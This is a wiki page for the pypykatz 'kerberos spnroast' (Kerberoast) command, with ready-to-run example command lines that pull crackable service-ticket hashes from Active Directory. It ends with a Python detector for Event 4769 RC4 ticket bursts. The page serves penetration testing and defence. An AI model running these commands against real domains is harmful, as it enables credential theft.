Kerberos spnroast command
skelsec edited this page Apr 15, 2021 · 3 revisions
Performs the SPNroast (aka Kerberoast) attack against a list of users.
The list of users can be in a file (one username per line) or can be given as a command line argument (at the end of the command). You may even mix the two.
Important: The expected format is `<user>@<realm>`, but you don't need to specify the target users using this format if you wish: just the username is enough IF you also supply the `-d <realm>` switch.
You will need the following things:
- Credentials of the user. This credential can be the password, the NT hash, or a secret key (RC4/AES128/AES256)
- A list of usernames prone to spnroast attack
- Instead of targets and realm you can use an LDAP connection string to load the targets automatically
- `-o`: Writes the result to a file
- `-d`: Realm aka domain name
- `-e`: Specifies which encryption type should be requested. Default is RC4 (23)
- `-t` or `--targets`: Targets to be loaded from file or as SPN string, or just username if `-d` is set.
- `-l` or `--ldap`: LDAP URL in ConnectionURL format. This will fetch the targets from the DC via LDAP.
- `url`: Kerberos URL in ConnectionURL format.
- `pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -t [email protected]`: Performs the Kerberoast attack against user [email protected]. Output will be printed to console in hashcat format
- `pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -d test.corp -t srv_http`: Same as above but this time the username and realm were specified separately
- `pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -d test.corp -t vulnerable_users.txt`: Same as above but the target users are fetched from the `vulnerable_users.txt` file
- `pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -e 18 [email protected]`: Same as the first command but the encryption type is changed to AES256. (just an example, don't do this)
- `pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -l 'ldap+ntlm-password://TEST\victim:[email protected]'`: spnroast against targets loaded via LDAP
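The `-e` switch above defaults to RC4 (etype 23), and the AES256 example shows why that matters from the other side of the wire: on the domain controller every service ticket request is logged as Security Event 4769 with its `TicketEncryptionType`, so a burst of RC4 (0x17) requests for many distinct SPNs from one account is the classic detection signature for this command. The following is an added detection example, not pypykatz code; the event records are constructed samples using the page's `victim` and `srv_http` names, and the window and threshold are assumed tuning values.

```python
# Added example (not part of pypykatz): flag the Kerberoast pattern in
# Windows Security Event 4769 (TGS request) records.
# Real records would come from the DC event log or a SIEM; the list below
# is constructed sample data using the page's example account and SPN names.
from collections import defaultdict
from datetime import datetime, timedelta

# Values of the 4769 "TicketEncryptionType" field:
# 0x17 = RC4-HMAC (etype 23, the tool's default), 0x11 = AES128, 0x12 = AES256.
RC4_HMAC = 0x17

# Constructed sample events: (timestamp, requesting account, service name, etype)
SAMPLE_4769 = [
    ("2021-04-15T10:00:01", "victim@TEST.CORP", "srv_http", 0x17),
    ("2021-04-15T10:00:02", "victim@TEST.CORP", "srv_sql", 0x17),
    ("2021-04-15T10:00:02", "victim@TEST.CORP", "srv_backup", 0x17),
    ("2021-04-15T10:00:03", "victim@TEST.CORP", "srv_web2", 0x17),
    ("2021-04-15T10:05:00", "alice@TEST.CORP", "srv_http", 0x12),  # AES: normal
    ("2021-04-15T11:00:00", "bob@TEST.CORP", "srv_sql", 0x17),     # one legacy RC4 request: noise
]

def detect_kerberoast(events, window=timedelta(minutes=5), min_services=3):
    """Return {account: [services]} for accounts that requested RC4 service
    tickets for at least `min_services` distinct services inside `window`.
    A single RC4 request is normal legacy noise; many different SPNs from one
    account in a short burst is what the spnroast command produces."""
    rc4_by_account = defaultdict(list)
    for ts, account, service, etype in events:
        if etype == RC4_HMAC:
            rc4_by_account[account].append((datetime.fromisoformat(ts), service))
    suspicious = {}
    for account, reqs in rc4_by_account.items():
        reqs.sort()
        # sliding window starting at each of the account's RC4 requests
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                suspicious[account] = sorted(services)
                break
    return suspicious

if __name__ == "__main__":
    for account, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible Kerberoast: {account} requested RC4 tickets for {services}")
```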